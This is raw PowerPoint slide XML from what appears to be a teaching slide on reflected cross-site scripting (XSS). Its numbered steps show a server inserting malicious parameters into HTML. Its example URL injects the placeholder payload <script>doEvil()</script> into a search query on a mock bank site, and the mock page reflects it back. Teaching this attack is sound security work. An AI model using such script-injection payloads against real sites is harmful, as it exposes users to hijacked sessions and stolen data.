              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="4843780" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="1871933"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safebank.com/search.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631616" y="5233605"/>
            <a:ext cx="390313" cy="242866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4388545"/>
            <a:ext cx="2479885" cy="1144692"/>
            <a:chOff x="275348" y="3291408"/>
            <a:chExt cx="1859914" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3301834"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929982" y="329617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9" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3418331"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>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31" name="object 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>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32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2134984" y="4668628"/>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3" name="object 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1217168" y="4630908"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="912875" y="3473180"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1653540" y="3473180"/>
              <a:ext cx="460235" cy="150866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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6" name="object 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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7" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1860794" y="3604245"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="912875" y="3700251"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="954683" y="3734722"/>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40" name="object 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104214" y="4752069"/>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41" name="object 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1360745" y="4695415"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="1020558" y="3521561"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="object 42"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1655064" y="3535667"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>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4" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>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5" name="object 45"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1020558" y="3521561"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641753" y="5158094"/>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7" name="object 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204976" y="4941817"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="903732" y="3706362"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 48"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="903732" y="3706362"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 49"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>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51" name="object 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="960221" y="3762463"/>
              <a:ext cx="233679" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="233680" h="154304">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52" name="object 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259096" y="5060638"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542644" y="407731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sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="object 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2202247"/>
            <a:ext cx="1351280" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778241" y="2446087"/>
            <a:ext cx="3192780" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2394584" h="172719">
                <a:moveTo>
                  <a:pt x="2394204" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1287780" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736092" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736092" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287780" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2394204" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2394204" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778241" y="2394609"/>
            <a:ext cx="3192780" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>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57" name="object 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2693991"/>
            <a:ext cx="2211493" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> results</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs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783" y="333396"/>
            <a:ext cx="4111413" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748479" y="5417955"/>
            <a:ext cx="2237740" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>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4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8579315" y="3046306"/>
            <a:ext cx="3261360" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="496134" marR="6773" indent="-480048">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server inserts malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260969" y="5826669"/>
            <a:ext cx="2407073" cy="672706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16087" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="127"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-460" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>script.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>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7" name="object 7"/>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33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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5EC422"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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11" name="object 11"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="2490730"/>
            <a:ext cx="1530773" cy="1811020"/>
            <a:chOff x="1449049" y="1868047"/>
            <a:chExt cx="1148080" cy="1358265"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1468108" y="1887097"/>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4" name="object 14"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2937417" y="3877901"/>
            <a:ext cx="7450667" cy="1893147"/>
            <a:chOff x="2203063" y="2908426"/>
            <a:chExt cx="5588000" cy="1419860"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286000" y="3484879"/>
              <a:ext cx="4610735" cy="24130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610734" h="24129">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610481" y="23914"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
